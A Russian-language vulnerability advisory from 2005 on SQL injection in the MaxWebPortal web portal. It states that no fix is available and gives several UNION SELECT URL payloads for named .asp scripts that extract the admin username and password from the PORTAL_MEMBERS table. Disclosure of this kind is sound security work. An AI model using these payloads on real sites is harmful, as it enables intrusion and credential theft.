SQL-инъекция в MaxWebPortal

Дата публикации:
04.05.2005
Всего просмотров:
916
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: MaxWebPortal

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Уязвимость существует во многих сценариях из-за отсутствия фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,
NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select m_username,m_password,1,1,1,1,1,
1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_
DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,
1,1,1,1,1 from PORTAL_MEMBERS
where m_username='admin' union select

pics_popular.asp?10 LINK_ID, HIT,NAME, URL,
KEYWORD, DESCRIPTION, EMAIL, POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW,
BADLINK FROM pic union select m_username,m_password,
1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

dl_toprated.asp?10 RATING,Votes,DESCRIPTION,
NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from
PORTAL_MEMBERS where m_username='admin' union select

custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]

custom_link.asp?method=Forum&Forum_ID=[Sql inject]

URL производителей: www.maxwebportal.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Critical bug in Maxwebportal (Critical sql injections)

или введите имя

CAPTCHA